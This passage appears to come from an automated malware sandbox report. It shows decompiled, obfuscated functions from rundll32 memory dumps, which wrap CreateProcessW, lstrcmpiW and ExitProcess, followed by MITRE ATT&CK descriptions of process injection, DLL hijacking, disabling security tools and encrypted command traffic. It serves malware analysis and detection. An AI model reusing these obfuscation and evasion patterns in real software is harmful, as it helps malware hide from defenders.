				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00408002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0041E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0041020f
0x00410212
0x00410214
0x00410217
0x0041021a
0x0041021d
0x0041021f
0x00410224
0x00410232
0x00410235
0x00410238
0x00410239
0x0041023a
0x00410246
0x00410247
0x0041024c
0x00410250
0x00410257
0x0041025e
0x00410265
0x00410269
0x00410270
0x00410277
0x00410285
0x0041028a
0x00410291
0x00410298
0x0041029f
0x004102a9
0x004102af
0x004102b2
0x004102d5
0x004102e1
0x004102e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 004102E1

Strings

(Gt, xrefs: 0041025E

Memory Dump Source

Source File: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 953e4725b4a7803d389e9e47177773ee53630c30514b488f3d1a14486d3fb62a
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 6F2169B5D00208FBEF04DFA5CD0A9DEBBB2FB44314F108199E515AA250D7B55A50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0041E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x0040f3fd
0x0040f403
0x0040f407
0x0040f40e
0x0040f415
0x0040f422
0x0040f423
0x0040f429
0x0040f42c
0x0040f433
0x0040f43a
0x0040f441
0x0040f448
0x0040f44f
0x0040f456
0x0040f45d
0x0040f464
0x0040f46b
0x0040f479
0x0040f47c
0x0040f495
0x0040f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 0040F49F

Memory Dump Source

Source File: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: ee1fd9411e105db71d1424dc3d60e4558dff4849f506239f01b7694f6c45fc94
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 821106B1E1021DEBDF04DFE4C94A6EEBBB4FB14315F108188E921AA240E7B85B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5976 Parent PID: 4348 rundll32.exeCOMMON

Executed Functions

Function 02CC9100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E02CC9100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E02CB8002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E02CCE399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x02cc910a
0x02cc910c
0x02cc910d
0x02cc910e
0x02cc9111
0x02cc9114
0x02cc9117
0x02cc911a
0x02cc911d
0x02cc9120
0x02cc9123
0x02cc9126
0x02cc9127
0x02cc912a
0x02cc912d
0x02cc9130
0x02cc9133
0x02cc9134
0x02cc9137
0x02cc9138
0x02cc9139
0x02cc913a
0x02cc913f
0x02cc9149
0x02cc914c
0x02cc9153
0x02cc915a
0x02cc9161
0x02cc9168
0x02cc916f
0x02cc9176
0x02cc918e
0x02cc9191
0x02cc9198
0x02cc919f
0x02cc91a6
0x02cc91ad
0x02cc91b4
0x02cc91bb
0x02cc91c2
0x02cc91d5
0x02cc91ef
0x02cc91f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02CC91EF

Strings

31, xrefs: 02CC919F

Memory Dump Source

Source File: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, Offset: 02CB0000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: e69567b5d0391faf254d5e8a0083c4ec6dc11af0f058fdcfe5cbca9c82ca0ce9
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 4831E172801259BB8F559FA6CD05CDEBFB9EB89710F108158FA1462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02CC0207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02CB8002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E02CCE399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x02cc020f
0x02cc0212
0x02cc0214
0x02cc0217
0x02cc021a
0x02cc021d
0x02cc021f
0x02cc0224
0x02cc0232
0x02cc0235
0x02cc0238
0x02cc0239
0x02cc023a
0x02cc0246
0x02cc0247
0x02cc024c
0x02cc0250
0x02cc0257
0x02cc025e
0x02cc0265
0x02cc0269
0x02cc0270
0x02cc0277
0x02cc0285
0x02cc028a
0x02cc0291
0x02cc0298
0x02cc029f
0x02cc02a9
0x02cc02af
0x02cc02b2
0x02cc02d5
0x02cc02e1
0x02cc02e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 02CC02E1

Strings

(Gt, xrefs: 02CC025E

Memory Dump Source

Source File: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, Offset: 02CB0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 4c979890700f186dc9a0620c414680caab0284f071c5668ea7c4ef4662893e56
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: EE2178B5E00208FBEF04DFA4CC0A9DEBBB2FB44314F10C199E515AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02CBF3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02CBF3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E02CCE399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x02cbf3fd
0x02cbf403
0x02cbf407
0x02cbf40e
0x02cbf415
0x02cbf422
0x02cbf423
0x02cbf429
0x02cbf42c
0x02cbf433
0x02cbf43a
0x02cbf441
0x02cbf448
0x02cbf44f
0x02cbf456
0x02cbf45d
0x02cbf464
0x02cbf46b
0x02cbf479
0x02cbf47c
0x02cbf495
0x02cbf49f

APIs

ExitProcess.KERNEL32(00000000), ref: 02CBF49F

Memory Dump Source

Source File: 00000008.00000002.622693429.0000000002CB0000.00000040.00000010.sdmp, Offset: 02CB0000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: 291f8b38bdae78256f19020b55ba9cc76edcd46b79fceaeab26b8aa4bd36cca4
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 8411D6B1E1121DEBDF04DFE4D94A6EEBBB4FB14315F108188E521AA250E7B45B558F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5116 Parent PID: 6560 rundll32.exeCOMMON

Executed Functions

Function 04719100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E04719100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E04708002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0471E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0471910a
0x0471910c
0x0471910d
0x0471910e
0x04719111
0x04719114
0x04719117
0x0471911a
0x0471911d
0x04719120
0x04719123
0x04719126
0x04719127
0x0471912a
0x0471912d
0x04719130
0x04719133
0x04719134
0x04719137
0x04719138
0x04719139
0x0471913a
0x0471913f
0x04719149
0x0471914c
0x04719153
0x0471915a
0x04719161
0x04719168
0x0471916f
0x04719176
0x0471918e
0x04719191
0x04719198
0x0471919f
0x047191a6
0x047191ad
0x047191b4
0x047191bb
0x047191c2
0x047191d5
0x047191ef
0x047191f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 047191EF

Strings

31, xrefs: 0471919F

Memory Dump Source

Source File: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: acafc23efc0472728899041f0d491b3edb903b63de5cf613f2a0afacdb95babc
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: EE31C372801259BBCF559FA6CD49CDFBFB5FB89714F108158FA1462120C3729A60EB61

Uniqueness

Uniqueness Score: -1.00%

Function 04710207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E04710207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04708002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0471E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0471020f
0x04710212
0x04710214
0x04710217
0x0471021a
0x0471021d
0x0471021f
0x04710224
0x04710232
0x04710235
0x04710238
0x04710239
0x0471023a
0x04710246
0x04710247
0x0471024c
0x04710250
0x04710257
0x0471025e
0x04710265
0x04710269
0x04710270
0x04710277
0x04710285
0x0471028a
0x04710291
0x04710298
0x0471029f
0x047102a9
0x047102af
0x047102b2
0x047102d5
0x047102e1
0x047102e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 047102E1

Strings

(Gt, xrefs: 0471025E

Memory Dump Source

Source File: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: fdc9a3975af2f6617077cd790e4e1e345675b2638441d980f96e592daef03ef5
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: C62178B5E00208FBEF04DFA8CC0A9DEBBB2FB44314F10C599E525AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0470F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0470F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0471E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x0470f3fd
0x0470f403
0x0470f407
0x0470f40e
0x0470f415
0x0470f422
0x0470f423
0x0470f429
0x0470f42c
0x0470f433
0x0470f43a
0x0470f441
0x0470f448
0x0470f44f
0x0470f456
0x0470f45d
0x0470f464
0x0470f46b
0x0470f479
0x0470f47c
0x0470f495
0x0470f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 0470F49F

Memory Dump Source

Source File: 0000000F.00000002.754640431.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: af862d09ac51aee0d7c0e59366becd884aa6a41daa2a60328debca6f7bc1be76
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 1F11D6B1E1121DEBDF04DFE4D94A6EEBBB4FB14315F108188E921AA250E7B45B558F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

